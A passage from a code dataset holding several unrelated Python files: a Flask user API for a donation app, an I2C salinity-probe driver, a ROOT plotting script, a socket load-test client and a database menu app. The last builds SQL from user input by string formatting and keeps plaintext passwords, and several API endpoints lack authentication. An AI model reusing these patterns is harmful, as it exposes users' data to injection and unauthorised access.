donare.lib.notifications import notify_message\nfrom flask_login import login_required, current_user\nfrom sqlalchemy.exc import IntegrityError\nimport datetime\n\nuserapi = Blueprint(__name__, 'donare.blueprints.users')\nCONTENT_TYPE_JSON = \"application/json\"\n\n\n@userapi.route('user/current', methods=['GET'])\n@login_required\ndef get_current_user():\n    user = User.query.get(current_user.id)\n    if not user:\n        return api_response(True, \"invalid user\", 400)\n\n    # TODO: add deleted_at validation\n\n    return api_response(False, \"Success\", 200, user.to_serializable())\n\n\n@userapi.route('user/<int:user_id>', methods=['GET'])\n@login_required\ndef get_user(user_id):\n    user = User.query.get(user_id)\n    if not user:\n        return api_response(True, \"invalid user\", 400)\n\n    # TODO: add deleted_at validation\n\n    return api_response(False, \"Success\", 200, user.to_serializable())\n\n\n@userapi.route('user/<email>', 
methods=['GET'])\n@login_required\ndef get_user_by_email(email):\n    if not email:\n        return api_response(True, \"Params not supplied\", 400)\n\n    user = User.query.filter(User.email == email).order_by(\n        User.id.desc()).first()\n\n    # TODO: add deleted_at validation\n\n    if not user:\n        return api_response(True, \"user not found\", 404)\n\n    return api_response(False, \"Success\", 200, user.to_serializable())\n\n\n@userapi.route('user/<phone_number>', methods=['GET'])\n@login_required\ndef get_user_by_phone(phone_number):\n\n    if not phone_number:\n        return api_response(True, \"Params not supplied\", 400)\n\n    phone_number = '' if not phone_number else phone_number.strip()\n\n    user = User.query.filter(User.phone_number.like('%'+phone_number))\\\n        .order_by(User.id.desc()).first()\n\n    # TODO: add deleted_at validation\n\n    if not user:\n        return api_response(True, \"user not found\", 404)\n\n    return api_response(False, \"Success\", 200, user.to_serializable())\n\n\n@userapi.route('user', methods=['GET'])\ndef get_user_by_params():\n    app.logger.debug('0')\n    name = request.args.get('name', False, type=str)\n    email = request.args.get('email', False, type=str)\n    phone_number = request.args.get('phone_number', False, type=str)\n\n    if not email and not phone_number and not name:\n        return api_response(True, \"Params not supplied\", 400)\n\n    name = '' if not name else name\n    email = '' if not email else email\n    phone_number = '' if not phone_number else phone_number.strip()\n\n    user = False\n    if phone_number:\n        user = User.query.filter(User.phone_number.like('%'+phone_number))\\\n            .order_by(User.id.desc()).first()\n\n    if not user and email:\n        user = User.query.filter(User.email == email).order_by(\n            User.id.desc()).first()\n\n    if not user and name:\n        user = User.query.filter(User.name == name).order_by(\n            User.name.desc()).first()\n\n    # TODO: add deleted_at validation\n\n    if not user:\n        return api_response(True, \"invalid user\", 400)\n\n    return api_response(False, \"Success\", 200, user.to_serializable())\n\n\n@userapi.route('user_exists', methods=['HEAD'])\ndef user_exists():\n    app.logger.debug('0')\n    email = request.args.get('email', False, type=str)\n    phone_number = request.args.get('phone_number', False, type=str)\n\n    if not email and not phone_number:\n        return api_response(True, \"Params not supplied\", 400)\n\n    email = '' if not email else email\n    phone_number = '' if not phone_number else phone_number.strip()\n\n    user = False\n    if phone_number:\n        user = User.query.filter(User.phone_number.like('%'+phone_number))\\\n            .order_by(User.id.desc()).first()\n    if email:\n        user = User.query.filter(User.email == email).order_by(\n            User.id.desc()).first()\n\n    # TODO: add deleted_at validation\n\n    if not user:\n        return api_response(True, \"User not found\", 404)\n\n    return api_response(False, \"Success\", 200)\n\n\n@userapi.route('user/<int:user_id>/register_token', methods=['POST'])\ndef register_token(user_id):\n    token = request.form.get('token', default=False, type=str)\n\n    if not token:\n        return api_response(True, \"Params not supplied\", 400)\n\n    user = User.query.get(user_id)\n\n    if not user:\n        return api_response(True, \"invalid user\", 400)\n\n    user.gcm_id = token\n    user.updated_at = datetime.datetime.now()\n    db.session.add(user)\n    db.session.commit()\n\n    return api_response(False, \"Token added successfully\", 200)\n\n\n@userapi.route('user', methods=['POST'])\ndef register_user():\n    name = request.form.get('name', default=False, type=str)\n    birth_date = request.form.get('birth_date', default=False, type=str)\n    email = 
request.form.get('email', default=False, type=str)\n    profile_picture = request.form.get('profile_picture', default=False,\n                                       type=str)\n    gender = request.form.get('gender', default=False, type=str)\n    city = request.form.get('city', default=False, type=str)\n    blood_type = request.form.get('blood_type', default=False, type=str)\n    country_code = request.form.get('country_code', default=False, type=str)\n    is_donor = request.form.get('is_donor', default=False, type=str)\n    gcm_id = request.form.get('gcm_id', default=False, type=str)\n    phone_number = request.form.get('phone_number', default=False, type=str)\n    is_phone_validated = request.form.get(\"is_phone_validated\", False)\n    latitude = request.form.get(\"latitude\", 0)\n    longitude = request.form.get(\"longitude\", 0)\n\n    # validating there's content\n    if (not name or not birth_date or\n            not email or not gender or\n            not city or not blood_type or\n            not country_code or not is_donor):\n        return api_response(True, \"Params not supplied\", 400)\n\n    if not valid_email(email):\n        return api_response(True, \"Email not valid\", 400)\n\n    bt_query = BloodType.query.filter(BloodType.name == blood_type).first()\n    if not bt_query:\n        return api_response(True, \"Wrong blood type\", 400)\n\n    country_q = Country.query.filter_by(alpha2=country_code)\n    country_code = country_q.first().code if country_q.count() > 0 else 214\n\n    new_user = User(name, profile_picture if profile_picture else '', '',\n                    email, gender, '', '', city, is_donor, bt_query.id,\n                    country_code, is_phone_validated, latitude, longitude)\n\n    if gcm_id:\n        new_user.gcm_id = gcm_id\n\n    if phone_number:\n        new_user.phone_number = phone_number\n\n    try:\n        new_user.birth_date = db_date_parse(birth_date)\n    except ValueError as ex:\n        app.logger.error(ex)\n        return api_response(True, \"Date format not valid\", 400)\n\n    new_user.status_id = 1\n    db.session.add(new_user)\n\n    try:\n        db.session.commit()\n    except IntegrityError as ex:\n        app.logger.error(ex)\n        return api_response(True, \"An error occurred while \"\n                            \"processing your request: \"\n                            \"user exists or data invalid\", 400)\n\n    return api_response(False, \"Created Successfully\", 201,\n                        new_user.to_serializable())\n\n\n@userapi.route('user/<int:user_to_id>/message', methods=['POST'])\n@login_required\ndef send_message(user_to_id):\n    message = request.form.get('message', False)\n    post_id = request.form.get('post_id', 0, type=int)\n\n    if not message:\n        return api_response(True, \"Parameters not supplied\", 400)\n\n    if not 1 < len(message) < 160:\n        return api_response(True, \"Length not valid\", 400)\n\n    if user_to_id == current_user.id:\n        return api_response(True, \"Can't send message to your own\", 400)\n\n    if not User.query.get(user_to_id):\n        return api_response(True, \"User does not exist\", 400)\n\n    message = Message(message, current_user.id, user_to_id)\n\n    post = Post.query.get(post_id)\n\n    if post:\n        message.post_id = post.id\n\n    db.session.add(message)\n    db.session.commit()\n\n    notify_message(message)\n    response = message.to_serializable()\n    return api_response(False, \"Sent\", 200, response)\n\n\n@userapi.route('user/<int:user_id>/notifications', methods=['GET'])\n@login_required\ndef get_notifications(user_id):\n    \"\"\"gets a paginated list of notifications\"\"\"\n\n    if user_id != current_user.id:\n        return api_response(True, \"Can't fetch other people's notifs\", 400)\n\n    newer_notif_id = request.args.get('newer_notif_id', 0, type=int)\n    older_notif_id = request.args.get('older_notif_id', 0, type=int)\n    limit = app.config.get('PAGINATION_LIMIT')\n    notifs_q = 
Notification.query.filter(Notification.user_id == user_id)\n\n if newer_notif_id > 0:\n notifs_q = notifs_q.filter(Notification.id > newer_notif_id)\n elif older_notif_id > 0:\n notifs_q = notifs_q.filter(Notification.id < older_notif_id)\n\n notifs_q = notifs_q.order_by(Notification.id.desc()).limit(limit).all()\n response = [u.to_serializable() for u in notifs_q]\n return api_response(False, \"Success\", 200, response)\n","sub_path":"web/donare/blueprints/api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":9329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"372054421","text":"import math\nimport struct\nimport time\nimport smbus\n\nglobal i2c\n\nEC_SALINITY = 0x3c # EC Salinity probe I2C address\n\nEC_MEASURE_EC = 80 # Command to start an EC measure\nEC_MEASURE_TEMP = 40 # Command to measure temperature\nEC_CALIBRATE_PROBE = 20 # Command to calibrate the probe\nEC_CALIBRATE_LOW = 10 # Command to calibrate the low point of the probe\nEC_CALIBRATE_HIGH = 8 # Command to calibrate the high point of the probe\nEC_I2C = 1 # Command to change the i2c address\nEC_DRY = 81 # Command to calibrate the probe for being dry\n\nEC_VERSION_REGISTER = 0 # version register\nEC_MS_REGISTER = 1 # mS register\nEC_TEMP_REGISTER = 5 # temperature in C register\nEC_K_REGISTER = 9 # cell constant register\nEC_SOLUTION_REGISTER = 13 # calibration solution register\nEC_TEMPCOEF_REGISTER = 17 # temperatue coefficient register\nEC_CALIBRATE_REFHIGH_REGISTER = 21 # reference low register\nEC_CALIBRATE_REFLOW_REGISTER = 25 # reference high register\nEC_CALIBRATE_READHIGH_REGISTER = 29 # reading low register\nEC_CALIBRATE_READLOW_REGISTER = 33 # reading high register\nEC_CALIBRATE_OFFSET_REGISTER = 37 # caliration offset\nEC_SALINITY_PSU = 41 # Salinity register\nEC_DRY_REGISTER = 45 # Dry calibration register\nEC_TEMP_COMPENSATION_REGISTER = 49 # temperature compensation register\nEC_CONFIG_REGISTER = 50 # config register\nEC_TASK_REGISTER = 51 # task register\n\nEC_EC_MEASUREMENT_TIME = 250 # delay between EC measurements\nEC_TEMP_MEASURE_TIME = 750 # delay for temperature measurement\n\nEC_DUALPOINT_CONFIG_BIT = 0 # dual point config bit\nEC_TEMP_COMPENSATION_CONFIG_BIT = 1 # temperature compensation config bit\n\nPSU_TO_PPT_CONVERSION = 1.004715 # conversion factor for PSU to PPT\n\n\nclass ecsalinity(object):\n S = 0\n mS = 0\n uS = 0\n PPM_500 = 0\n PPM_640 = 0\n PPM_700 = 0\n salinityPSU = 0\n salinityPPT = 0\n salinityPPM = 0\n tempC = 0\n tempF = 0\n tempCoefEC = 0.019\n tempCoefSalinity = 0.021\n address = EC_SALINITY\n\n def __init__(self, address, i2c_bus, **kwargs):\n global i2c\n self.address = address\n i2c = smbus.SMBus(i2c_bus)\n\n def measureTemp(self):\n self._send_command(EC_MEASURE_TEMP)\n time.sleep(EC_TEMP_MEASURE_TIME / 1000.0)\n self.tempC = self._read_register(EC_TEMP_REGISTER)\n self.tempF = ((self.tempC * 9) / 5) + 32\n return self.tempC\n\n def setTemp(self, temp_C):\n self._write_register(EC_TEMP_REGISTER, temp_C)\n self.tempF = ((self.tempC * 9) / 5) + 32\n \n def measureEC(self, tempCoefficient=None, newTemp=None):\n if tempCoefficient is None:\n tempCoefficient = self.tempCoefEC\n\n if newTemp is True:\n self.measureTemp()\n\n if self.usingTemperatureCompensation() is True:\n self.measureTemp()\n\n self._write_register(EC_TEMPCOEF_REGISTER, tempCoefficient)\n self._send_command(EC_MEASURE_EC)\n time.sleep(EC_EC_MEASUREMENT_TIME / 1000.0)\n self.mS = self._read_register(EC_MS_REGISTER)\n\n if 
math.isinf(self.mS) is not True:\n self.PPM_500 = self.mS * 500\n self.PPM_640 = self.mS * 640\n self.PPM_700 = self.mS * 700\n self.uS = self.mS * 1000\n self.S = self.mS / 1000\n else:\n self.mS = -1\n self.PPM_500 = -1\n self.PPM_640 = -1\n self.PPM_700 = -1\n self.uS = -1\n self.S = -1\n\n self.salinityPSU = self._read_register(EC_SALINITY_PSU)\n self.salinityPPT = self.salinityPSU * PSU_TO_PPT_CONVERSION\n self.salinityPPM = self.salinityPPT * 1000\n return self.mS\n\n def measureSalinity(self):\n self.measureEC(self.tempCoefSalinity, self.usingTemperatureCompensation())\n return self.salinityPSU\n\n def calibrateProbe(self, solutionEC, tempCoef):\n dualpoint = self.usingDualPoint()\n\n self.useDualPoint(0)\n self._write_register(EC_TEMPCOEF_REGISTER, tempCoef)\n self._write_register(EC_SOLUTION_REGISTER, solutionEC)\n self._send_command(EC_CALIBRATE_PROBE)\n time.sleep(EC_EC_MEASUREMENT_TIME / 1000.0)\n self.useDualPoint(dualpoint)\n\n def calibrateProbeLow(self, solutionEC, tempCoef):\n dualpoint = self.usingDualPoint()\n\n self.useDualPoint(0)\n self._write_register(EC_TEMPCOEF_REGISTER, tempCoef)\n self._write_register(EC_SOLUTION_REGISTER, solutionEC)\n self._send_command(EC_CALIBRATE_LOW)\n time.sleep(EC_EC_MEASUREMENT_TIME / 1000.0)\n self.useDualPoint(dualpoint)\n\n def calibrateProbeHigh(self, solutionEC, tempCoef):\n dualpoint = self.usingDualPoint()\n\n self.useDualPoint(0)\n self._write_register(EC_TEMPCOEF_REGISTER, tempCoef)\n self._write_register(EC_SOLUTION_REGISTER, solutionEC)\n self._send_command(EC_CALIBRATE_HIGH)\n time.sleep(EC_EC_MEASUREMENT_TIME / 1000.0)\n self.useDualPoint(dualpoint)\n\n def calibrateDry(self):\n self._send_command(EC_DRY)\n time.sleep(EC_EC_MEASUREMENT_TIME / 1000.0)\n\n def setK(self, k):\n self._write_register(EC_K_REGISTER, k)\n\n def getK(self):\n return self._read_register(EC_K_REGISTER)\n\n def getVersion(self):\n return self._read_byte(EC_VERSION_REGISTER)\n\n def getCalibrateOffset(self):\n return self._read_register(EC_CALIBRATE_OFFSET_REGISTER)\n\n def getCalibrateHighReference(self):\n return self._read_register(EC_CALIBRATE_REFHIGH_REGISTER)\n\n def getCalibrateLowReference(self):\n return self._read_register(EC_CALIBRATE_REFLOW_REGISTER)\n\n def getCalibrateHighReading(self):\n return self._read_register(EC_CALIBRATE_READHIGH_REGISTER)\n\n def getCalibrateLowReading(self):\n return self._read_register(EC_CALIBRATE_READLOW_REGISTER)\n\n def getCalibrateDry(self):\n return self._read_register(EC_DRY_REGISTER)\n\n def reset(self):\n n = float('nan')\n self._write_register(EC_K_REGISTER, n)\n self._write_register(EC_CALIBRATE_OFFSET_REGISTER, n)\n self._write_register(EC_CALIBRATE_REFHIGH_REGISTER, n)\n self._write_register(EC_CALIBRATE_REFLOW_REGISTER, n)\n self._write_register(EC_CALIBRATE_READHIGH_REGISTER, n)\n self._write_register(EC_CALIBRATE_READLOW_REGISTER, n)\n self._write_register(EC_DRY_REGISTER, n)\n self.setTempConstant(0)\n self.useDualPoint(False)\n self.useTemperatureCompensation(False)\n\n def setCalibrateOffset(self, offset):\n self._write_register(EC_CALIBRATE_OFFSET_REGISTER, offset)\n\n def setDualPointCalibration(self, refLow, refHigh, readLow, readHigh):\n self._write_register(EC_CALIBRATE_REFLOW_REGISTER, refLow)\n self._write_register(EC_CALIBRATE_REFHIGH_REGISTER, refHigh)\n self._write_register(EC_CALIBRATE_READLOW_REGISTER, readLow)\n self._write_register(EC_CALIBRATE_READHIGH_REGISTER, readHigh)\n\n def setTempConstant(self, b):\n self._write_byte(EC_TEMP_COMPENSATION_REGISTER, b)\n\n def 
getTempConstant(self):\n return self._read_byte(EC_TEMP_COMPENSATION_REGISTER)\n\n def setI2CAddress(self, i2cAddress):\n self._write_register(EC_SOLUTION_REGISTER, int(i2cAddress))\n self._send_command(EC_I2C)\n self.address = int(i2cAddress)\n\n def useTemperatureCompensation(self, b):\n retval = self._read_byte(EC_CONFIG_REGISTER)\n\n retval = self._bit_set(retval, EC_TEMP_COMPENSATION_CONFIG_BIT, b)\n self._write_byte(EC_CONFIG_REGISTER, retval)\n\n def useDualPoint(self, b):\n retval = self._read_byte(EC_CONFIG_REGISTER)\n\n retval = self._bit_set(retval, EC_DUALPOINT_CONFIG_BIT, b)\n self._write_byte(EC_CONFIG_REGISTER, retval)\n\n def usingTemperatureCompensation(self):\n retval = self._read_byte(EC_CONFIG_REGISTER)\n return (retval >> 1) & 0x01\n\n def usingDualPoint(self):\n retval = self._read_byte(EC_CONFIG_REGISTER)\n return (retval >> 0) & 0x01\n\n def _bit_set(self, v, index, x):\n mask = 1 << index\n v &= ~mask\n if x:\n v |= mask\n return v\n\n def _change_register(self, r):\n global i2c\n i2c.write_byte(self.address, r)\n time.sleep(10 / 1000.0)\n\n def _send_command(self, command):\n global i2c\n i2c.write_byte_data(self.address, EC_TASK_REGISTER, command)\n time.sleep(10 / 1000.0)\n\n def _write_register(self, reg, f):\n global i2c\n n = self.round_total_digits(f)\n fd = bytearray(struct.pack(\"f\", n))\n data = [0, 0, 0, 0]\n data[0] = fd[0]\n data[1] = fd[1]\n data[2] = fd[2]\n data[3] = fd[3]\n self._change_register(reg)\n i2c.write_i2c_block_data(self.address, reg, data)\n time.sleep(10 / 1000.0)\n\n def _read_register(self, reg):\n global i2c\n data = [0, 0, 0, 0]\n self._change_register(reg)\n data[0] = i2c.read_byte(self.address)\n data[1] = i2c.read_byte(self.address)\n data[2] = i2c.read_byte(self.address)\n data[3] = i2c.read_byte(self.address)\n ba = bytearray(data)\n f = struct.unpack('f', ba)[0]\n return self.round_total_digits(f)\n\n def _write_byte(self, reg, val):\n global i2c\n i2c.write_byte_data(self.address, reg, val)\n time.sleep(10 / 1000.0)\n\n def _read_byte(self, reg):\n global i2c\n self._change_register(reg)\n time.sleep(10 / 1000.0)\n return i2c.read_byte(self.address)\n\n def magnitude(self, x):\n if math.isnan(x):\n return 0\n return 0 if x == 0 else int(math.floor(math.log10(abs(x)))) + 1\n\n def round_total_digits(self, x, digits=7):\n return round(x, digits - self.magnitude(x))\n","sub_path":"aerolib/lib/EC_Salinity-1.1.3/python/RaspberryPi/ecsalinity.py","file_name":"ecsalinity.py","file_ext":"py","file_size_in_byte":10077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"255172076","text":"import os,sys,string, time\nimport ROOT\nfrom math import *\nfrom ROOT import TTree, TObject, TFile, gDirectory, TH1D, TH2D, TH3D, TCanvas, gROOT, TGaxis, gStyle, TColor, TLegend, THStack, TChain, TLatex, TText\n#from ROOT import *\nfrom array import array\nfrom glob import glob\n\n# Importing rootlogon.C\nROOT.gROOT.SetMacroPath('~/');\nROOT.gROOT.Macro( os.path.expanduser( 'rootlogon.C' ) )\n\n# Opening root file\n#f = TFile(\"files/NuMIFlux.root\")\nf = TFile(\"../NuMIFlux.root\")\nf.ls()\n\nh_nue_parent_muonplus = f.Get(\"nue_parent_muonplus\")\nh_nue_tgptype_muonplus_kaonplus = f.Get(\"nue_tgptype_muonplus_kaonplus\")\nh_nue_tgptype_muonplus_kaonlong = f.Get(\"nue_tgptype_muonplus_kaonlong\")\n\nch_nue_tgptype_muonplus = 
TCanvas(\"c1\",\"c1\",1000,1000)\nch_nue_tgptype_muonplus.SetLogy()\n\nh_nue_parent_muonplus.SetLineColor(ROOT.kBlack)\n#h_nue_parent_muonplus.SetFillColor(ROOT.kOrange+10)\nh_nue_parent_muonplus.GetXaxis().SetRangeUser(0,8)\nh_nue_parent_muonplus.GetXaxis().SetTitle(\"Neutrino Energy [GeV]\")\nh_nue_parent_muonplus.GetYaxis().SetTitle(\"#Phi(#nu) / 50 MeV / cm^{2} / 6x10^{20} POT\")\n\nh_nue_tgptype_muonplus_kaonplus.SetLineColor(ROOT.kRed-9)\nh_nue_tgptype_muonplus_kaonplus.SetFillColor(ROOT.kRed-9)\n#h_nue_tgptype_muonplus_kaonplus.SetFillStyle(3144)\n\nh_nue_tgptype_muonplus_kaonlong.SetLineColor(ROOT.kRed-4)\nh_nue_tgptype_muonplus_kaonlong.SetFillColor(ROOT.kRed-4)\nh_nue_tgptype_muonplus_kaonlong.SetFillStyle(3144)\n\nh_nue_parent_muonplus.Draw();\nh_nue_tgptype_muonplus_kaonplus.Draw(\"same\");\nh_nue_tgptype_muonplus_kaonlong.Draw(\"same\");\n\nleg = TLegend(.5, .55, .7, .70)\nleg.SetFillStyle(0);\n#gStyle.SetLegendTextSize(2/30.);\nleg.AddEntry(h_nue_parent_muonplus, \"parent #mu^{+}\", \"l\");\nleg.AddEntry(h_nue_tgptype_muonplus_kaonplus, \"tgptype K^{+}\", \"f\");\nleg.AddEntry(h_nue_tgptype_muonplus_kaonlong, \"tgptype K^{0}_{L}\", \"f\");\nleg.Draw();\n\nt = TLatex(.4, .625, \"#nu_{e}\");\nt.SetTextColor(ROOT.kBlack);\nt.SetNDC();\nt.SetTextSize(2/30.);\nt.SetTextAlign(32);\nt.Draw();\n\n#t2 = TLatex(.51, .48, \"#splitline{Off-axis NuMI Flux}{at MicroBooNE}\");\n#t2.SetTextColor(ROOT.kRed+2);\n#t2.SetNDC();\n#t2.SetTextSize(1.4/30.);\n#t2.SetTextAlign(11);\n#t2.Draw();\n\n#t3 = TLatex(.51, .40, \"Anti-Neutrino Mode\");\n#t3.SetTextColor(ROOT.kBlack);\n#t3.SetNDC();\n#t3.SetTextSize(1.4/30.);\n#t3.SetTextAlign(11);\n#t3.Draw();\n\n\nraw_input(\"Please press enter to exit.\")\n","sub_path":"NuMIFluxMod/nu_parent_scripts/nue_tgptype_muonplus.py","file_name":"nue_tgptype_muonplus.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"107751177","text":"values = {\n 1: 'Мужчина',\n 2: 'Коты и животные',\n 3: 'Юмор',\n 4: 'Кулинария и handmade',\n 5: 'Мультфильмы',\n 6: 'Спорт',\n 7: 'Fashion',\n 8: 'Marvel/сериалы',\n 9: 'Кино',\n 10: 'Музыка',\n 11: 'Семья',\n 12: 'Татуировки',\n 13: 'Учёба',\n 14: 'Английский язык',\n 15: 'Аниме',\n 16: 'Бизнес',\n 17: 'Компьютерные игры',\n 18: 'Искусство',\n 19: 'Свадьба',\n 21: 'Наука',\n 22: 'Автомобили',\n 23: 'Математика и программирование',\n 24: 'Литература',\n 25: 'Праздничные мероприятия',\n 26: 'Йога и танцы',\n 27: 'Туризм',\n 28: 'Девушка',\n 29: 'Эзотеризм',\n 30: 'Театр',\n 31: 'Дизайн',\n 32: 'Велоспорт',\n 33: 'Активный отдых',\n}\n","sub_path":"app/values.py","file_name":"values.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18689690","text":"import time\nimport socket\nimport multiprocessing\n\nimport json\nimport struct\n\n\ndef sendJson(request, jsonData):\n data = json.dumps(jsonData).encode()\n request.send(struct.pack('i', len(data)))\n request.sendall(data)\n\n\ndef recvJson(request):\n data = request.recv(4)\n length = struct.unpack('i', data)[0]\n data = request.recv(length).decode()\n while len(data) != length:\n data = data + request.recv(length - len(data)).decode()\n data = json.loads(data)\n return data\n \n\nclass main(multiprocessing.Process):\n def __init__(self, i):\n super().__init__()\n self.i = i\n\n def run(self):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect(('127.0.0.1', 
1234))\n sendJson(client, ['Hello'])\n data = recvJson(client)\n\n\na = time.time()\nprocesses = []\nfor i in range(1000):\n p = main(i)\n p.start()\n processes.append(p)\nfor p in processes:\n p.join()\nprint(time.time() - a)\n","sub_path":"tests/twisted/json_client.py","file_name":"json_client.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"537247746","text":"from datetime import datetime\nfrom datetime import timedelta\ndef show_menu():\n \"\"\"\n Prints in console the main menu\n :return: VOID\n \"\"\"\n print(\"User Menu \\n\"\n \"1. Create Account \\n\"\n \"2. Login \\n\"\n \"3. Search \\n\"\n \"4. Insert \\n\"\n \"5. Update \\n\"\n \"6. Delete \\n\"\n \"7. Exit \\n\")\ndef show_table_names(tables):\n \"\"\"\n Show all the tables names\n :param tables: a list with the tables names.\n You can get it by calling the method\n get_table_names() from DB object\n :return: VOID\n \"\"\"\n index = 1\n print(\"\\nTables:\")\n for table in tables:\n print(table[0]) # print tables names\n index += 1\ndef find_id_number(db_object,table,attribute):\n \"\"\"\n Finds the next available Unique ID number for any table\n \"\"\"\n\n #get a list of all ID's from the table\n query = \"\"\"SELECT {} FROM {}\"\"\".format(attribute,table)\n results = db_object.select(query=query)\n index=0\n #if known exists go with 0\n if results == ():\n return index\n \n match = False\n #Search each number until an unused ID is found\n while match == False:\n for result in results:\n match=False\n if index == result[0]:\n \n index=index+1\n break\n match=True\n\n \n #return ID index\n return index\n\n \n\ndef option1(db_object):\n try:\n #Collect User Account Information\n acctType=input(\"\\nWhat Type of Account is this: 1. Visistor or 2. Manager?(Type Number please)\")\n username=input(\"\\nChoose a username: \")\n password=input(\"\\nChoose a password: \")\n name=input(\"\\nWhat is your name? \")\n email=input(\"\\nWhat is your Email? 
\")\n\n #get Unique ids for a new account and a new user\n userid=str(find_id_number(db_object,\"User\",\"userid\"))\n acctId=str(find_id_number(db_object,\"Account\",\"acctId\"))\n \n #insert new user \n db_object.insert(table='User', attributes=('userid','Name','Email'),values=(userid,name,email))\n #insert new account with userId as foerign key\n db_object.insert(table='Account',attributes=('acctId','username','acctType','password','userId'),values=(acctId,username,acctType,password,userid))\n update_session(db_object,userid)\n #if failed run option1 again\n except Exception as err:\n print(err)\n option1(db_object)\n\n#Update Session with a thirty minute time window of use until asking for password again\ndef update_session(db_object, userid):\n #get unique session ID\n sessionId=str(find_id_number(db_object,\"session\",\"sessionId\"))\n #calculate the current time of session update\n now = datetime.now()\n\n #add 30 minutes\n expires = now + timedelta(minutes=30)\n exp= expires.strftime('%Y-%m-%d %H:%M:%S')\n\n user=userid[0]\n userId=str(user[0])\n\n \n\n#Add new session, before being able to use option after 30 minutes you must resign in\n try:\n db_object.insert(table='session', attributes=('sessionId','userSessionId','expires'), values=(sessionId,userId,exp))\n\n except Exception as err:\n print(err)\n\n\n\ndef option2(db_object):\n #get username and password\n username = input(\"\\nUsername: \")\n password = input(\"\\nPassword: \")\n query=\"\"\"SELECT * FROM Account WHERE username = '{}' and password = '{}'\"\"\".format(username,password)\n try:\n #search for username and password combo as username is Unique\n account= db_object.select(query=query)\n\n\n except Exception as err:\n print(err)\n \n\n if account == ():\n #restart if not found\n print(\"Password/Username combination does not exist\\n\")\n option2(db_object)\n # get the user ID from the account \n userIdquery=\"\"\"SELECT userId FROM Account WHERE username = '{}' and password = '{}'\"\"\".format(username,password)\n userid=db_object.select(query=userIdquery)\n\n #update session time of login\n update_session(db_object,userid)\n return \n\n#Search for a entity by specifying search parameters\ndef option3(db_object):\n now = datetime.now()\n expire = now.strftime('%Y-%m-%d %H:%M:%S')\n permissiveTables=[]\n try:\n #create query for current session\n query= \"\"\"SELECT userSessionId FROM session WHERE expires > '{}'\"\"\".format(expire)\n\n #query sessoions for current userId\n userId=db_object.select(query=query)\n \n #if query is empty no one is signed in\n if userId==():\n print(\"You're Not Logged In\")\n option2(db_object)\n option3(db_object)\n userId1=userId[0]\n userId2=str(userId1[0])\n\n #find acctType by querying account\n acctTypeQuery=\"\"\"SELECT acctType FROM Account WHERE userId = '{}'\"\"\".format(userId2)\n userAcctType= db_object.select(query=acctTypeQuery)\n acctId1=userAcctType[0]\n acctId2=str(acctId1[0])\n #get the tables that the user have access to Read\n featureQuery=\"\"\"SELECT feature FROM accountFeatures WHERE accountType = '{}'\"\"\".format(acctId2)\n featureId=db_object.select(query=featureQuery)\n \n tableList=[]\n tables=[]\n \n for feature in featureId:\n tableList.append(feature[0])\n \n for tabled in tableList:\n tables.append(db_object.select(query=\"\"\"SELECT tables FROM feature WHERE featureId = '{}' AND permission = 'Read'\"\"\".format(str(tabled))))\n \n for tabs in tables:\n for t in tabs:\n if t[0]!= ():\n permissiveTables.append(t[0])\n print(\"Tables with Search 
Permission\")\n count=0\n for search in permissiveTables:\n print(\"\"\"{}. {}\"\"\".format((count+1),search ))\n count=count+1\n except Exception as err:\n print(err)\n #display the names of the tales with permissions to choose from\n\n try:\n userSearch= int(input(\"Type the number of the table you would like to search in? \"))\n searchTable = permissiveTables[(userSearch-1)]\n #display fields for search criteria\n columns = db_object.get_column_names(searchTable)\n print(\"Fields in this Table: \")\n for column in columns:\n print(column[0])\n except Exception as err:\n print(\"Number must be in the range.\")\n option3(db_object)\n\n #get search criteria\n fieldSearch = input(\"Field: \")\n valueSearch= input(\"Value: \")\n try:\n searched = db_object.select(query=\"\"\"SELECT * FROM {} WHERE {} = '{}'\"\"\".format(permissiveTables[(userSearch-1)],fieldSearch,valueSearch))\n if searched ==():\n print(\"No results Found\")\n find=searched[0]\n counting=0\n for column in columns:\n print(\"\"\"{}: {}\"\"\".format(column[0],find[counting]))\n counting= counting+1\n return\n except Exception as err:\n print(\"No results Found\")\n \n return\n\n\n\ndef option4(db_object):\n now = datetime.now()\n expire = now.strftime('%Y-%m-%d %H:%M:%S')\n try:\n #create query for current session\n query= \"\"\"SELECT userSessionId FROM session WHERE expires > '{}'\"\"\".format(expire)\n\n #query sessoions for current userId\n userId=db_object.select(query=query)\n\n #if query is empty no one is signed in\n if userId==():\n print(\"You're Not Logged In\")\n option2(db_object)\n option4(db_object)\n #find acctType by querying account\n userId1=userId[0]\n userId2=str(userId1[0])\n acctTypeQuery=\"\"\"SELECT acctType FROM Account WHERE userId = '{}'\"\"\".format(userId2)\n userAcctType= db_object.select(query=acctTypeQuery)\n acctId1=userAcctType[0]\n acctId2=str(acctId1[0])\n \n featureQuery=\"\"\"SELECT feature FROM accountFeatures WHERE accountType = '{}'\"\"\".format(acctId2)\n featureId=db_object.select(query=featureQuery)\n\n tableList=[]\n tables=[]\n permissiveTables=[]\n #get the tables that the user have access to Write\n for feature in featureId:\n tableList.append(feature[0])\n \n for tabled in tableList:\n tables.append(db_object.select(query=\"\"\"SELECT tables FROM feature WHERE featureId = '{}' AND permission = 'Write'\"\"\".format(str(tabled))))\n \n for tabs in tables:\n for t in tabs:\n if t[0]!= ():\n permissiveTables.append(t[0])\n except Exception as err:\n print(err)\n #display the names of the tales with permissions to choose from\n print(\"Tables with Write Permission\")\n if permissiveTables == []:\n print(\"You Dont have that permission\")\n return\n count=0\n for search in permissiveTables:\n print(\"\"\"{}. {}\"\"\".format((count+1),search ))\n count=count+1\n #get the table being added to \n try:\n userSearch= int(input(\"Type the number of the table you would like to delete from? 
